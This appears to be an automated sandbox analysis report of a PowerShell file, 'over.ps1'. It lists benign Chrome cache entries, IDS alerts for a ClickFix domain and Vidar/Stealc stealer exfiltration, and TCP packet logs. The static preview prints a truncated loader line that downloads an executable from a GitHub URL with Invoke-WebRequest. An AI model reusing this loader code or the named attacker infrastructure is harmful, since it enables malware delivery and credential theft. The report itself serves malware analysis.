                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (821)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):826
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.147111087321417
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:O60i9WPRV1IBHslgT9lCuABATccuoB7HHHHHHHYqmffffffo:O6BWPR3IKlgZ01BAgcuSEqmffffffo
                                                                                                                                                                                                                                                                                          MD5:6589D22AD359D511B49F3C7CD3C4547D
                                                                                                                                                                                                                                                                                          SHA1:F080F1C7D1E1FE2C78769736D56740DF8C5B18CD
                                                                                                                                                                                                                                                                                          SHA-256:C45E32269D3FAC7CF9D54C222661FA2F8D022D764B372BE8E0BD1006CDA8E9CF
                                                                                                                                                                                                                                                                                          SHA-512:491DE1E5E7BB4AD24A7937654B18F46C569966000C64A0F41782C32B1975A62F31063EEC2F7AA34475EFA31892F05BB0935D1411746DDAB5652C3F50DC67ADF4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                          Preview:)]}'.["",["giant schnauzer wins dog show","nintendo switch release date","ripple xrp news","marvel rivals season 1 leaks","t coronae borealis nova","weather storms tornadoes","lauren maenner nick bosa","12 grapes new year tradition"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":-510401305808829624,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 490

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1395)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):117446
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.490775275046353
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
                                                                                                                                                                                                                                                                                          MD5:942EA4F96889BAE7D3C59C0724AB2208
                                                                                                                                                                                                                                                                                          SHA1:033DDF473319500621D8EBB6961C4278E27222A7
                                                                                                                                                                                                                                                                                          SHA-256:F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
                                                                                                                                                                                                                                                                                          SHA-512:C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0"
                                                                                                                                                                                                                                                                                          Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b

                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 491

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):29
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                          MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                          SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                          SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                          SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                          Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 492

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):132757
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.436781905615346
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:fRkJQ7O4N5dTm+syHEt4W3XdQ4Q6ruSr/nUW2i6o:f4Q7HTt/sHdQ4Q6rDfUW8o
                                                                                                                                                                                                                                                                                          MD5:AFDFD43E18563C4D04634D86CDFF8F3B
                                                                                                                                                                                                                                                                                          SHA1:5E50D7262732F2627165A310E8C99663AAD45508
                                                                                                                                                                                                                                                                                          SHA-256:A911ECFD373426C902B2EE91BC2DC4233F8EC6206BB8725A73BE41E01322C997
                                                                                                                                                                                                                                                                                          SHA-512:0AE9C594B7F155B7E47B01DEF2530F61B8C4D5B3EC212D73831018DDF87FAFB0A5241FD96D929AF0C5F373D7D3A4A2BBD1E5167BCAA8A8B3BEB18C246BDE21BC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                          Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 493

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):175897
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.549876394125764
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4clQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQIfr:t0PuJQ+ApsOOFZNnvFlqOQMmsWrBQoSd
                                                                                                                                                                                                                                                                                          MD5:2368B9A3E1E7C13C00884BE7FA1F0DFC
                                                                                                                                                                                                                                                                                          SHA1:8F88AD448B22177E2BDA0484648C23CA1D2AA09E
                                                                                                                                                                                                                                                                                          SHA-256:577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
                                                                                                                                                                                                                                                                                          SHA-512:105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu0yU9RTMfNNC-LVUmaaNKwIO136g"
                                                                                                                                                                                                                                                                                          Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi||(_.Yi=new Zi)).set(a,b);(_.$i||(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a|2:a&-3;return(a|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a|1};_.hj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.ij=function(a,b,c){32&b&&c||(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_

                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 494

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5162
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                                          MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                                          SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                                          SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                                          SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                                                          Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 495

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1660
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                                          MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                                          SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                                          SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                                          SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          File type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.072802062684222
                                                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                                                            File name:over.ps1
                                                                                                                                                                                                                                                                                            File size:1'245 bytes
                                                                                                                                                                                                                                                                                            MD5:657bc0b7650e5a675cd7b293766fbdb5
                                                                                                                                                                                                                                                                                            SHA1:7c2cebd51bf266b5c577f96d99c2611c1e33314f
                                                                                                                                                                                                                                                                                            SHA256:3855e15e8ccc5defba674ad44fe84618524e61516502a4bd7ccaaf6b209642bb
                                                                                                                                                                                                                                                                                            SHA512:3fe632b79c2e9dd84922fb07019b5a6e474306f8fb5434ca91ade5b6e2a039f55a4e0e091c81b2d468669979c3e1177847910e03d33a20df73d47b0d5ace76ee
                                                                                                                                                                                                                                                                                            SSDEEP:24:xvMMG/WqHWtmr97H5elXz4+FaRxYztt6uwhQotAXhQuuwUnYk:pfnq289VelD4+FcGt6uwKotA6Ydk
                                                                                                                                                                                                                                                                                            TLSH:ED21FE2B292C0A16C1F55158FB116585EFB3D12783179D24B8FCD648AF615BC8234E9A
                                                                                                                                                                                                                                                                                            File Content Preview:$url = "https://raw.githubusercontent.com/rk2026/civil/refs/heads/main/MatAugust.exe"..$response = Invoke-WebRequest -Uri $url -UseBasicParsing..$fileBytes = $response.Content..if (-not ([AppDomain]::CurrentDomain.GetAssemblies() | ForEach-Object { $_.Get

                                                                                                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                                                                                                            Icon Hash:3270d6baae77db44

                                                                                                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                            2024-12-31T16:58:11.182679+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.2.549704185.199.109.133443TCP
                                                                                                                                                                                                                                                                                            2024-12-31T16:58:11.182815+01001810003Joe Security ANOMALY Windows PowerShell HTTP PE File Download2185.199.109.133443192.168.2.549704TCP
                                                                                                                                                                                                                                                                                            2024-12-31T16:58:17.403241+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.2.54970534.160.111.145443TCP
                                                                                                                                                                                                                                                                                            2024-12-31T16:58:17.866675+01002058345ET EXPLOIT_KIT ClickFix Domain in DNS Lookup (saaadnesss .shop)1192.168.2.5639701.1.1.153UDP
                                                                                                                                                                                                                                                                                            2024-12-31T16:58:18.496151+01002058346ET EXPLOIT_KIT ClickFix Domain in TLS SNI (saaadnesss .shop)1192.168.2.549706185.121.235.167443TCP
                                                                                                                                                                                                                                                                                            2024-12-31T16:58:46.376793+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.549812116.203.14.4443TCP
                                                                                                                                                                                                                                                                                            2024-12-31T16:58:47.707413+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.549823116.203.14.4443TCP
                                                                                                                                                                                                                                                                                            2024-12-31T16:58:49.014417+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1116.203.14.4443192.168.2.549832TCP
                                                                                                                                                                                                                                                                                            2024-12-31T16:58:50.373263+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11116.203.14.4443192.168.2.549841TCP

                                                                                                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:06.975352049 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:06.975356102 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:07.084863901 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:10.560484886 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:10.560522079 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:10.560585976 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:10.573721886 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:10.573738098 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.048408985 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.048626900 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.052597046 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.052607059 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.053108931 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.069158077 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.111335993 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.182698011 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.182831049 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.182874918 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.182928085 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.182950974 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.182964087 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.183027983 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.183036089 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.183666945 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.183710098 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.183722019 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.183728933 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.183754921 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.187575102 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.187621117 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.187676907 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.187685013 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.187745094 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.198451996 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.240976095 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.271429062 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.271508932 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.271549940 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.271589041 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.271598101 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.271644115 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.271650076 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.271804094 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.271909952 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.271918058 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.272164106 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.272207975 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.272248030 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.272264004 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.272272110 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.272324085 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.272330046 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.272371054 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.272382021 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.272387981 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.272428989 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.273046017 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.273104906 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.273144960 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.273185015 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.273194075 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.273200989 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.273230076 CET49704443192.168.2.5185.199.109.133
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.273819923 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.273859978 CET44349704185.199.109.133192.168.2.5
                                                                                                                                                                                                                                                                                            Dec 31, 2024 16:58:11.273871899 CET49704443192.168.2.5185.199.109.133
